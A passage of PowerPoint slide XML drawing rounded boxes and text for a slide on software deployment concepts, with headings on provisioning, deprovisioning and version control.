                    <a:pt x="2108688" y="2146300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2091416" y="2082800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2072493" y="2006600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052046" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2029948" y="1879600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2006326" y="1816100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1981053" y="1752600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1954510" y="1689100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926189" y="1625600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1865356" y="1498600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1798554" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1726164" y="1257300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1648059" y="1143000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564493" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1475593" y="927100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1381486" y="812800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1282299" y="723900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1178159" y="622300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069320" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955528" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837418" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714736" y="304800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587863" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522712" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456672" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389616" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252456" y="88900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182352" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75095" y="37986"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2189479" h="5626100">
                  <a:moveTo>
                    <a:pt x="61563" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="19141" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8018" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1123" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4615" y="50800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14089" y="63500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27539" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42650" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56511" y="63500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67633" y="63500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74119" y="51555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36175" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39477" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75652" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71036" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61563" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2189479" h="5626100">
                  <a:moveTo>
                    <a:pt x="39477" y="25400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="36175" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74119" y="51555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74529" y="50800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75095" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39477" y="25400"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2189479" h="5626100">
                  <a:moveTo>
                    <a:pt x="75652" y="25400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="39477" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75095" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75652" y="2540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844795" y="7234427"/>
              <a:ext cx="1278890" cy="832485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1278889" h="832484">
                  <a:moveTo>
                    <a:pt x="1140078" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138556" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94739" y="7071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56701" y="26761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26716" y="56784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7058" y="94853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="138684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="693420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7058" y="737255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26716" y="775325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56701" y="805346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94739" y="825033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138556" y="832104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140078" y="832104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1183896" y="825033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221934" y="805346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251919" y="775325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1271577" y="737255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1278636" y="693420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1278636" y="138684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1271577" y="94853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251919" y="56784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221934" y="26761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1183896" y="7071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140078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844795" y="7234427"/>
              <a:ext cx="1278890" cy="832485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1278889" h="832484">
                  <a:moveTo>
                    <a:pt x="0" y="138684"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7058" y="94853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26716" y="56784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56701" y="26761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94739" y="7071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138556" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140078" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1183896" y="7071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221934" y="26761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251919" y="56784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1271577" y="94853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1278636" y="138684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1278636" y="693420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1271577" y="737255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251919" y="775325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221934" y="805346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1183896" y="825033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140078" y="832104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138556" y="832104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94739" y="825033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56701" y="805346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26716" y="775325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7058" y="737255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="693420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="13868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5392928" y="7439659"/>
            <a:ext cx="18542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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>3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763514" y="5118861"/>
            <a:ext cx="1292860" cy="843280"/>
            <a:chOff x="5763514" y="5118861"/>
            <a:chExt cx="1292860" cy="843280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5769864" y="5125211"/>
              <a:ext cx="1280160" cy="830580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1280159" h="830579">
                  <a:moveTo>
                    <a:pt x="1141476" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138684" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94853" y="7057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56784" y="26708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26761" y="56674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7071" y="94674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="692150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7071" y="735905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26761" y="773905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56784" y="803871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94853" y="823522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138684" y="830580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1141476" y="830580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1185306" y="823522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223375" y="803871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253398" y="773905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1273088" y="735905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1280160" y="692150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1280160" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1273088" y="94674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253398" y="56674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223375" y="26708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1185306" y="7057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1141476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769864" y="5125211"/>
              <a:ext cx="1280160" cy="830580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1280159" h="830579">
                  <a:moveTo>
                    <a:pt x="0" y="138429"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7071" y="94674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26761" y="56674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56784" y="26708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94853" y="7057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138684" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1141476" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1185306" y="7057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223375" y="26708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253398" y="56674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1273088" y="94674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1280160" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1280160" y="692150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1273088" y="735905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253398" y="773905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223375" y="803871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1185306" y="823522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1141476" y="830580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138684" y="830580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94853" y="823522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56784" y="803871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26761" y="773905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7071" y="735905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="692150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="13842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6317996" y="5328920"/>
            <a:ext cx="18542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40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684521" y="2919729"/>
            <a:ext cx="1291590" cy="843280"/>
            <a:chOff x="4684521" y="2919729"/>
            <a:chExt cx="1291590" cy="843280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="object 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4690871" y="2926079"/>
              <a:ext cx="1278890" cy="830580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1278889" h="830579">
                  <a:moveTo>
                    <a:pt x="1140078" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138556" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94739" y="7057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56701" y="26708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26716" y="56674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7058" y="94674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="138430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="692150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7058" y="735905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26716" y="773905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56701" y="803871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94739" y="823522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138556" y="830580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140078" y="830580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1183896" y="823522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221934" y="803871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251919" y="773905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1271577" y="735905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1278636" y="692150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1278636" y="138430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1271577" y="94674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251919" y="56674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221934" y="26708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1183896" y="7057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140078" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4279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690871" y="2926079"/>
              <a:ext cx="1278890" cy="830580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1278889" h="830579">
                  <a:moveTo>
                    <a:pt x="0" y="138430"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7058" y="94674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26716" y="56674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56701" y="26708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94739" y="7057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138556" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140078" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1183896" y="7057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221934" y="26708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251919" y="56674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1271577" y="94674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1278636" y="138430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1278636" y="692150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1271577" y="735905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251919" y="773905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221934" y="803871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1183896" y="823522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140078" y="830580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138556" y="830580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94739" y="823522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56701" y="803871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26716" y="773905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7058" y="735905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="692150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="13843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5239003" y="3129787"/>
            <a:ext cx="18542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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>1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290817" y="2814650"/>
            <a:ext cx="6255385" cy="1031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2635"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="15" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Provisioning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ts val="2650"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="75"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="44484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2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th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1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pro</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ces</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="44484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14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44484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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>deployi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="44484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70">
                <a:solidFill>
                  <a:srgbClr val="44484E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9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44484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0">
                <a:solidFill>
                  <a:srgbClr val="44484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14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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>appl</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="44484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50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>cati</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="44484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20">
                <a:solidFill>
                  <a:srgbClr val="44484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8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50">
                <a:solidFill>
                  <a:srgbClr val="44484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14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the  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>environment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75703" y="5007610"/>
            <a:ext cx="6084570" cy="103314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0" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Deprovisioning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ts val="2650"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="44484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2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th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1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pro</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ces</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="44484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14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44484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44484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5">
                <a:solidFill>
                  <a:srgbClr val="44484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mo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>v</a:t>
            </a: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0">
                <a:solidFill>
                  <a:srgbClr val="44484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70">
                <a:solidFill>
                  <a:srgbClr val="44484E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114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44484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0">
                <a:solidFill>
                  <a:srgbClr val="44484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14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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>appl</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="44484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50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>cati</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="44484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20">
                <a:solidFill>
                  <a:srgbClr val="44484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9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>fr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="44484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10">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>m  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>packages</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484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3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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>instances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585584" y="7151878"/>
            <a:ext cx="7978140" cy="1031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2635"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="30" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Version</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="45" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Control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ts val="2650"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="75"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="44484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2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th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1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pro</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ces</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="44484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14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44484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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ass</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="44484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95">
                <a:solidFill>
                  <a:srgbClr val="44484E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105">
                <a:solidFill>
                  <a:srgbClr val="44484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0">
                <a:solidFill>
                  <a:srgbClr val="44484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70">
                <a:solidFill>
                  <a:srgbClr val="44484E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8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44484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0">
                <a:solidFill>
                  <a:srgbClr val="44484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3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ID</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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f</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="44484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5">
                <a:solidFill>
                  <a:srgbClr val="44484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12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5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>v</a:t>
